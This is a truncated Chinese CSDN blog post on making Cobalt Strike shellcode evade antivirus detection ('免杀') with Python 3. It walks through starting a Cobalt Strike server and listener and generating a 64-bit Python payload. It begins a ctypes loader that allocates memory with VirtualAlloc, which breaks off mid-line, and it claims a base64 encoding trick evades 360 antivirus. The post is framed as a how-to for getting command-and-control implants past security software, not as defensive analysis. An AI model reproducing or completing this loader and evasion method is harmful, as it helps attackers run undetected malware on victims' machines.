python3+Cobal Strikeshellcode免杀技术

本文介绍了如何使用python3处理Cobal Strike(CS)生成的shellcode进行免杀。首先,通过CS神器生成64位python格式payload,将shellcode插入python脚本并打包成exe。尽管初次尝试被杀毒软件检测到,但通过base64编码和解码的第二种方法,成功避免了360的查杀,并在virscan.org上展示了较好的免杀效果。后续文章将继续探讨更多免杀策略。
摘要由CSDN通过智能技术生成

python3处理shellcode

目前使用python3处理CS神器生成的shellcode免杀效果还是可以的;本章我们使用基于python3的脚本对shellcode做处理,生成exe后进行免杀。

第一种

首先我们kali打开CS神器服务端
在这里插入图片描述
客户端启动
在这里插入图片描述
创建一个监听器
在这里插入图片描述
使用CS神器生成python格式的payload
在这里插入图片描述
这里记得点击使用64位的,点击生成,查看生成的payload
在这里插入图片描述
我们使用python脚本

import ctypes

#shellcode加载
def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    ptr = ctypes.windll.kernel32.VirtualAlloc
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值